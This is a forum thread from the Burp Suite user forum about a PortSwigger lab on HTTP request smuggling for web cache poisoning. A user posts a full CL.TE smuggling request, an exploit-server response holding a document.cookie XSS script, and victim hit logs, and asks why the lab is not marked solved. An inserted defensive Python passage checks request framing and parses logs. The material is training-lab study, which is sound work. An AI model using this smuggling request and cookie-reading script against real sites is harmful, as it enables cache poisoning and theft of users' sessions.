Burp Suite User Forum


Exploiting HTTP request smuggling to perform web cache poisoning - Failing to go to "Solved" status

Joshua | Last updated: Sep 27, 2024 03:44AM UTC

Here is my cache poisoning / smuggled request:

POST / HTTP/1.1
Host: 0a16007d0305e2b380340869000b001a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Transfer-Encoding: chunked

0

GET /post/next?postId=3 HTTP/1.1
Host: exploit-0a190088031de26f8094071201cb00b9.exploit-server.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1
GET /resources/js/tracking.js HTTP/2
Host: 0a16007d0305e2b380340869000b001a.web-security-academy.net
Connection: close

My Exploit Server settings:

File: /post
Head: HTTP/1.1 200 OK
Body: <script> alert(document.cookie) </script>

I am getting multiple hits from the victim in my logs, and on occasion, when I refresh the application site, I also get redirected to my exploit server and the alert executes.

The logs:

10.0.3.226 2024-09-27 03:36:09 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:36:17 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
75.1.242.172 2024-09-27 03:36:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
75.1.242.172 2024-09-27 03:36:49 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
75.1.242.172 2024-09-27 03:36:49 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
75.1.242.172 2024-09-27 03:37:12 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
75.1.242.172 2024-09-27 03:37:12 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
10.0.3.226 2024-09-27 03:37:25 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:37:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
75.1.242.172 2024-09-27 03:37:45 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
75.1.242.172 2024-09-27 03:37:45 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
75.1.242.172 2024-09-27 03:37:59 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
10.0.3.226 2024-09-27 03:38:21 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:38:28 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:38:37 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:38:43 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:38:49 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:38:55 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:39:01 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:39:06 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.3.226 2024-09-27 03:39:11 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"

Clearly, this lab should be solved. But it is not.
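As an added, defender-side example (not code from this thread, from PortSwigger, or from the lab): the request in the post above only works as a smuggling vector because it carries both Content-Length and Transfer-Encoding, so a front end and back end can disagree on where the request ends. The Python below does two things a practitioner would want when looking at this thread: it parses a raw HTTP/1.1 request head and reports the framing ambiguities a front end should reject under RFC 9112 section 6.3, and it parses exploit-server-style log lines in the format shown in the post to count hits coming from the "(Victim)" user agent separately from the tester's own browser. The hostname, IP addresses and log lines are constructed for the example and are not the lab's values.

```python
import re
from collections import Counter

# ---- Part 1: flag ambiguous request framing (the precondition for CL.TE smuggling) ----

def parse_request_head(raw: bytes) -> tuple[str, dict[str, list[str]]]:
    """Split a raw HTTP/1.1 request into its request line and a lower-cased header
    map. Repeated headers are kept as a list so duplicates stay visible."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed header line; a strict front end would reject the request
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def framing_problems(headers: dict[str, list[str]]) -> list[str]:
    """Return the framing ambiguities a front end should refuse to forward.
    RFC 9112 section 6.3 lets a server reject a request carrying both
    Transfer-Encoding and Content-Length, and requires closing the connection
    after such a request either way, so it can never desynchronise a shared
    back-end connection."""
    problems = []
    cl = headers.get("content-length", [])
    te = headers.get("transfer-encoding", [])
    if cl and te:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        problems.append("conflicting duplicate Content-Length values")
    if any(not v.isdigit() for v in cl):
        problems.append("non-numeric Content-Length")
    if te and [v.lower() for v in te] != ["chunked"]:
        problems.append("Transfer-Encoding is not a single 'chunked' value")
    return problems


# Constructed sample: same header combination as the request in the post, placeholder host.
AMBIGUOUS_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: lab.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 3\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)
# Constructed sample with unambiguous framing.
CLEAN_REQUEST = b"POST / HTTP/1.1\r\nHost: lab.example.test\r\nContent-Length: 3\r\n\r\nx=1"


# ---- Part 2: separate victim-bot hits from the tester's own browser in the exploit-server log ----

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) (?P<date>\S+) (?P<time>\S+) (?P<tz>\S+) '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<version>[^"]+)" (?P<status>\d{3}) '
    r'"user-agent: (?P<ua>[^"]*)"$'
)


def victim_hits(log_text: str) -> Counter:
    """Count requests per path that came from the lab's victim browser, recognised by
    the '(Victim)' token in its User-Agent; lines from other clients are ignored."""
    hits: Counter = Counter()
    for line in log_text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m and "(Victim)" in m.group("ua"):
            hits[m.group("path")] += 1
    return hits


# Constructed log lines in the same layout as the excerpt in the post (IPs are placeholders).
SAMPLE_LOG = """\
10.0.0.1 2024-09-27 03:36:09 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
203.0.113.5 2024-09-27 03:36:33 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
203.0.113.5 2024-09-27 03:36:49 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36"
10.0.0.1 2024-09-27 03:37:25 +0000 "GET /post?postId=4 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
"""

if __name__ == "__main__":
    for label, req in (("ambiguous", AMBIGUOUS_REQUEST), ("clean", CLEAN_REQUEST)):
        request_line, headers = parse_request_head(req)
        print(f"{label}: {request_line} -> {framing_problems(headers) or 'no framing problems'}")
    print("victim hits per path:", dict(victim_hits(SAMPLE_LOG)))
```

The framing check is what a reverse proxy or WAF rule should apply before a request reaches a back end that shares keep-alive connections; the log parser is the quick way to confirm, as the poster does by eye, that the hits on /post are from the lab's victim client rather than from your own browser refreshes.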

Ben, PortSwigger Agent | Last updated: Sep 27, 2024 01:25PM UTC

Hi Joshua, If you try this across several different lab instances (so if you let the lab instance expire and relaunch the lab so that you obtain a lab with a different URL) does this behaviour persist?

Joshua | Last updated: Oct 01, 2024 01:18AM UTC

I just tried everything again. This behavior is persisting. I also modified the body payload, back to text/javascript, as outlined in the official solution, and I saw the same failure to go to solve status.
